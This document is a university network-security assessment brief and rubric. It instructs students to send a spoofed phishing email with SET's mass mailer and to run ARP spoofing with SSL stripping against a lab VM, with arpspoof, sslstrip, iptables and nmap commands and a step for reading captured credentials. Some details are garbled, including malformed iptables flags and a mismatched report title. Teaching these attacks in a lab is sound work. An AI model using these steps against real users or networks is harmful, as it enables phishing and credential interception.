Assessment 3: Information and Rubric

Subject Code NTW 600

Subject Name Computer Network and Security

Assessment Number and Title Assessment 3: Generation of Mass Mailer
Attacks, Striping and Spoofing by Using Kali
Linux
Assessment Type Individual Assessment
Length / Duration 2000 +/-10% words
Weighting % 30%
Total Marks 100
Submission Online Submission
Due Date Week-11(Sunday at 23:59)
Mode Face-to-Face
Individual
Format a) Report
b) In-Class Presentations Plus Viva

Assessment Description and Instructions

There are two major tasks that students are supposed to perform in this assessment.
1- Social engineering attacks - Mass Mailer Attack
2- SSL Stripping and ARP Spoofing in Kali Linux

Part-1 Social engineering attacks - Mass Mailer Attack

Social engineering attacks are one of the top techniques used against networks today. Why spend days,
weeks, or even months trying to penetrate layers of network security when we can just trick a user into
running a file that allows us full access to their machine and bypass antivirus, firewalls, and many
intrusion detection systems? This is most commonly used in phishing attacks today, craft an e-mail or
create a fake website that tricks user into running, malicious file that creates a backdoor into their
system.
In this assessment student will use Kali Linux which includes one of the popular social engineering
attack toolkit available, Devid kennedy's Social Engineering Toolkit (SET). More recently several non-
social engineering tools have also been added to SET making it a very robust attack tool.
Follow the steps to generate a mailer attack.

Step-1 Installation of Kali Linux:

Kali Linux is a popular operating system used for penetration testing and ethical hacking. While Kali
Linux is primarily designed to be installed on its own dedicated hardware or as a virtual machine, there
are ways to install it on Windows and macOS. Here are the general steps for installing Kali Linux on
both operating systems:
Installation on Windows:
1. Download the Kali Linux installer for Windows from the official Kali Linux website.
2. Run the installer executable file and follow the on-screen instructions.
3. Choose the installation location and other options as per your preference.
4. Once the installation is complete, you can launch Kali Linux from the Start menu or desktop
shortcut.
Installation on macOS:
1. Download the Kali Linux ISO image for macOS from the official Kali Linux website.
2. Install a virtualization software like VirtualBox or VMware Fusion on your macOS.
3. Open the virtualization software and create a new virtual machine.
4. Configure the virtual machine settings, including allocating system resources and attaching the
Kali Linux ISO image as the bootable media.
5. Start the virtual machine and follow the Kali Linux installation process within the virtualized
environment.
6. Once the installation is complete, you can access Kali Linux by running the virtual machine
and launching the operating system.
It's important to note that Kali Linux is a powerful tool and should be used responsibly and legally.
Ensure you have a valid use case and adhere to the applicable laws and regulations when using Kali
Linux. Additionally, make sure to keep your Kali Linux installation updated with the latest security
patches and updates to maintain its effectiveness and security.

After the successful installation, students are required to follow the steps outlined

Step-2 type following command in a terminal :

setoolkit

The Screenshot is following :

We can see the Social-Engineering Attacks in the top of the menu, so we choose number 1 and hit
Enter. Then we will be displayed social engineering options as we can see in the following
screenshot:
Here in this lab we choose options 5. That is Mass Mailer Attack.
Step-3
One way a Social Engineer will attack a network is to send out a flood of e-,ails to company address
and see who will respond or run the malicious attachment we sent with it.

After entering in option 5 in SET we got two options

1. E-mail Attack single E-mail Address

2. E-mail Attack Mass Mailer
The screenshot is following:

For this example let's just send one. We press 1 and hit "Enter".
Step-4
Then we enter a target e-mail address. See the following screenshot
For this example, let's just send one. We press 1 and hit "Enter".

Now we select option 1 to use a Gmail account or another server. For this lab we will use a fake
Gmail account. The Gmail address and password must be correct.
Then we choose a spoofed name to use for the 'from' line of the message. Let's use
"[email protected]" so it look that it's from Google. Pay special attention to this field, as this
where the real social engineering takes place.
Now SET asks for the password of the Gmail account.

Then we press yes at the prompt "Flag this message/s as high priority ?"

We don't want to attach any malicious file so we choose "no" when prompt "Do you want to attach a
file ?"

Next enter an e-mail subject line. What about "Important update"

Enter "p" when prompted to "Send the message as html or plain ?"

Now type-in a fake message, preferably one that will entice our victim to click on a malicious link
included or entice them surf to a malicious web page.

In actual defense practice this could just be a test webpage that records the IP address of those who
were tricked to surf to the page. That way as a security expert we know who in our organization needs
to be better educated on the risks of malicious e-mails.

When finished we type "END" in the last line. Just like following screenshot.
Then press "Enter" and SET will send out the e-mail to victim.

The message in above screenshot is obviously a silly fake, but something like this (With a much more
believable message ) could be used to test employee's ability to detect, resist and report phishing
attempts.

So far we have just sent a fake e-mail that could redirect someone to a bogus site. But if we could
make a fake site that offered up a booby script, and if the user allows the script to create shell with the
user.

*Note that some SMTP servers may require authentication, and you'll need to provide valid
credentials for successful delivery.

Final Outcomes and submission:

Students are expected to follow all the steps to generate fake email during the lab work activity in
week 6, the final online submission would be a file containing all the step-by-step procedure with the
screenshots of the work on Moodle.
 Pat-2 SSL Stripping and ARP Spoofing in Kali Linux

SSL Stripping and ARP Spoofing are two common techniques used in network security attacks.
They are often employed by attackers to intercept and manipulate network traffic, particularly
in scenarios where Secure Sockets Layer (SSL) encryption is used for secure communication.
SSL Stripping: SSL Stripping is an attack method that aims to downgrade a secure HTTPS
connection to an insecure HTTP connection, making the traffic susceptible to interception and
manipulation. The attacker typically acts as a Man-in-the-Middle (MitM) by intercepting the
communication between the client and the server. The attack involves the following steps:
a. The attacker sets up a rogue access point or performs DNS spoofing to redirect the victim's
traffic through their own device.
b. The attacker intercepts the initial HTTPS request from the victim and responds with a
modified HTTP response instead of the expected HTTPS response.
c. The attacker then establishes an HTTPS connection with the server on behalf of the victim,
making the victim unaware of the downgrade.
d. Throughout the communication, the attacker intercepts and relays the traffic between the
client and the server, potentially capturing sensitive information.
Kali Linux, being a powerful penetration testing and security auditing platform, can be used to
perform SSL stripping attacks. Tools like "sslstrip" and "Bettercap" are commonly used in Kali
Linux for this purpose.

ARP Spoofing: ARP (Address Resolution Protocol) Spoofing, also known as ARP Poisoning,
is an attack technique used to manipulate the ARP table in a local network. The attack allows
the attacker to redirect network traffic meant for a specific IP address to their own device. The
steps involved in an ARP Spoofing attack are as follows:
a. The attacker sends falsified ARP messages to the target network, associating their own MAC
address with the IP address of another device on the network, such as the default gateway or a
specific target.
b. As a result, the target network starts sending its traffic to the attacker's device, believing it
to be the legitimate destination.
c. The attacker can then intercept and manipulate the traffic as desired, potentially capturing
sensitive data or launching further attacks.

In Kali Linux, various tools like "Ettercap" and "arpspoof" are available for performing ARP
Spoofing attacks. These tools allow the attacker to sniff network traffic, intercept packets, and
manipulate them.

Structure Diagram:

For understanding a better way let’s see below diagram:

There are mainly 4 steps in this type of attack:
1. Victim requests to the server in HTTPS but by arpspoof attacker spoofed network
and the request HTTPS pass through the attacker machine.
2. After hijacking the HTTPS Request attackers use the same HTTPS Request to
the server because many modern servers respond only in HTTPS mode.
3. When the server responds in HTTPS encrypted format attacker changes it from
HTTPS to HTTP, which is a secure connection.

4. For the victim, the request attacker responds in the

form of HTTP and works as a man-in-the-middle.

These types of attacks can be done in public networks. A malicious user can also make their
personal WI-FI network and when anyone gets connected to the network they perform
credential theft attacks on bank accounts or any other malicious activity.

In this assessment student will use Kali Linux which includes one of the popular social
engineering attack toolkit available by following the steps bellow.

SSL Stripping and ARP Spoofing Usage

Following are steps for performing SSL Stripping and ARP Spoofing in Kali Linux:
Step 1: Open the Kali Linux terminal in root mode.
Step 2: Type the following command in the terminal and hit enter to install sslstrip:
$ apt install sslstrip

Installation of sslstrip in our Kali Linux is done successfully.

Step 3: Type the following command in the terminal and hit enter to install dsniff:
$ apt install dsniff

Installation of dsniff in our Kali Linux is done successfully.

Step 4: Type the following command in the terminal and hit enter for finding out the name of
the interface of the network.
$ ifconfig
This will show which interface we are using. In our case interface is eth0 and IP is 10.0.2.4
Step 5: Execute the following command in the terminal and hit enter for IP forwarding-

$ echo '1' > /proc/sys/net/ipv4/ip_forward

This will make our Kali Machine a router network.

Step 6: Type the following command in the terminal and hit enter for IP table configuration:

$ iptables-t nat -A PREROUTING -p tcp–dport 80 -j REDIRECT –to-port 8080

This will configure our routing table and destination port 80 and it will redirect to port 8080.

Step 7: Type the following command in Terminal and hit enter for finding out the gateway IP
of our router.
$ route -n

This will show our gateway IP address. In our case gateway, IP is 10.0.2.1 Step 8: Type the
following command in the terminal and hit enter for finding out targets in the network –
$ nmap -sS -O <gateway ip>/24
In our case gateway, IP is 10.0.2.1 so we will use this gateway IP for our task-
$ nmap -sS -O 10.0.2.1/24
This will scan and show all IP of the router and based on the scan result we can identify our
target. In our case, we want to attack the second VM machine which is Windows so we will
open VM Windows.
Step 9: Open up the command prompt of VM Windows and type ipconfig and hit enter:
$ ipconfig
This will show our VM Windows IP as well as the gateway. Here we can also verify our
gateway IP address.
In our case, VM Windows IP is 10.0.2.5

Step 10: Now open up a new terminal with root access in Kali Linux and type the following
command and hit enter.
This will start the arpspoof of our target machine.
$ arpspoof -i <interface> -t <target IP> -r <gateway IP>
in our case that is
$ arpspoof -i eth0 -t 10.0.2.5 -r 10.0.2.1
Now the arp spoofing is started.
Step 11: Without closing the arpspoof terminal open up a new terminal with root access and
type the following command in the terminal and hit enter:
$ sslstrip -l 8080

This will start SSL stripping on the VM Windows Targeted machine.

Step 12: Now open up the targeted Windows browser and type any web page name. In our
case we type https://instagram.com it will go to the login page of Instagram and we are
going to enter random data and click the login button.
This data will be captured by the sslstrip.log file in our Kali Linux system.

Step 13: Now open up a new terminal in Kali Linux with root access and type the following
command in the terminal and hit enter.

$ cat sslstrip.log

this will show captured data. In this way, we can perform SSL Stripping and ARP Spoofing
in our Kali Linux system.

Presentations on Case Study Questions: 10 Marks

Structure of the Report (75 Marks)

Title: Case Study Report: Software Development Process and Budget Control System

1. Introduction (10 Marks)

• Briefly introduce the Social engineering attacks - Mass Mailer Attack,

SSL Stripping and ARP Spoofing in Kali Linux

• Provide relevant background information.

• Explain the purpose of the report and the importance of addressing the
provided questions.

2. Analysis and Technical Findings

• Part-1 (25)

• Perform practically all the steps mentioned in “Part-1 Social engineering

attacks - Mass Mailer Attack” in your systems (laptops), take a
screenshot of your Kali results with each step.

• Part-2 (25)

• Perform practically all the steps mentioned in “Part-2 SSL Stripping and
ARP Spoofing in Kali Linux” in your systems (laptops), take a screenshot
of your Kali results with each step.

• Write down your findings if you successfully conducted a Mass Mailer

attack, Stripping and Spoofing.
 3. Solutions to prevent from these attacks (10)

• What are the potential solutions to prevent spam, mailer attacks or

spoofing, how to secure your systems from further attacks.

4. Conclusion (5)

• Summarize the main points and outcomes of this technical report.

• Reiterate the significance of the topic and the relevance of the contents.

• Offer final thoughts or reflections on the cyber attacks and its

implications.

5. References

• Include a list of all the sources cited in the report, following a consistent
citation style (IEEE referencing style).

6. Appendices (optional)

• Include any supplementary materials, such as additional data, charts,

graphs, or supporting documents.

In class Demonstration (25)

Each student is required to present their work in front of the class during week 11.
This presentation should involve a demonstration of your technical work using Kali
Linux on your system. Make sure your presentation will be conducting during the
class followed by a technical viva on your project. The following week, week 12,
marks the submission deadline for your report. Failure to present your work as
scheduled could result in a failing grade for the entire assessment.

Submission Details
• This is an individual assessment.
• You must submit your report in a word or pdf PIA format on the Turnitin link
available on the Moodle.
• The assessment carries 30% weightage and is marked out of 100.
• Your similarity index should be less than 20%. However, if the plagiarism
percentage exceeds 25%, your assessment will undergo a thorough
investigation, and it may result in a deduction of marks or even a failing grade.
 NTW600 Assessment # 3 Marking Rubric: Generation of Mass Mailer Attacks, Striping and Spoofing by
Using Kali Linux
Marking F (Fail) P (Pass) C (Credit) D (Distinction) HD (High Distinction)

0-49% 50-64% 65-74% 75-84% 85-100%

Introduction/ Overview Unsatisfactorily or Fairly conveys the Accurately conveys Accurately conveys Accurately Plus
of the topics unclearly conveys the report topic. the report topic. the project topic, concisely conveys the
topic of the technical Some relevance Some relevance methods. Generally project topic, methods.
report. and briefly and briefly relevant and Generally relevant and
This is not relevant to presented. presented. analysed. Good analysed. Good
the assignment topic. Poor introduction Poor introduction of analysis of the case analysis of the case
(10) Completely unable to of the assignment the assignment study of conveys the study of conveys the
introduce Mass Mailer topic. topic. report topic. report topic. Accurately
Attack, arp spoofing Poorly introduce Poorly introduce Accurately introduce introduce Mass Mailer
and stripping. Mass Mailer Mass Mailer Attack, Mass Mailer Attack, Attack, Arp spoofing
Attack, Arp Arp spoofing and Arp spoofing and and stripping.. Excellent
spoofing and stripping. stripping. overview of the case
stripping. study or accurately
provided a background
of the study.
Analysis and Technical Unable to install kali Poorly presented Accurately Successfully Excellently performed
Findings Linux, unable to the technical stuff. presented the performed the the complete activity,
conduct any kind of Able to install kali technical stuff. Able complete activity, presented the technical
Part-1 Social Mass Mailer Attack, Linux, partially to install kali Linux, presented the stuff. install kali Linux,
engineering attacks - stripping, or ARP conducted any kind partially conducted technical stuff. Able Conducted Mass Mailer
Mass Mailer Attack spoofing attacks. No of Mass Mailer any kind of Mass to install kali Linux, Attack, stripping, or
Attack, stripping, or Mailer Attack, Conducted Mass ARP spoofing attacks.
Pat-2 SSL Stripping and outcomes from the Kali ARP spoofing stripping, or ARP Mailer Attack, Outcomes are
ARP Spoofing in Kali are presented. attacks. Outcomes spoofing attacks. stripping, or ARP completely described/
Linux are not completely Outcomes are not spoofing attacks. all the steps from each
described/ Missed completely Outcomes are part of the assessment
more than half described/ Missed completely described/ has been finalised.
steps of the task-1 few steps from each all the steps from Fabulously presented
(50 = 25+25)
and task-2 part of the each part of the the analysis of the
assessment. assessment has been outcomes.
finalised.

Solutions/ Argument is confused Adequate cohesion Mostly consistent Consistency logical Logic is clear and easy
and disjointed in and conviction in logical and and convincing. to follow with strong
Conclusion/referencing recommendations. recommendations. convincing. Clear referencing arguments. Solutions to
Lacks consistency with Sometimes clear Generally good style. Clear the problem are
(15)
many errors. Weak referencing style. referencing style. Conclusion accurate.
Conclusion Weak Conclusion Well augmented Clear styles with
conclusion excellent source of
references. Concrete
conclusion

Demonstrations Demonstration is Adequate cohesion Mostly consistent Consistency logical Logic is clear and easy
confused and and conviction. logical and and convincing. show to follow with strong
In-class Presentations disjointed. Lack of show a poor convincing. show a a good knowledge arguments.
knowledge about the knowledge about limited knowledge about the design
(25) show a strong
design, implementation, the design, about the design implementation, and
and development implementation, implementation, and development process knowledge about the
process and development development design implementation,
process process and development
process
Blank Page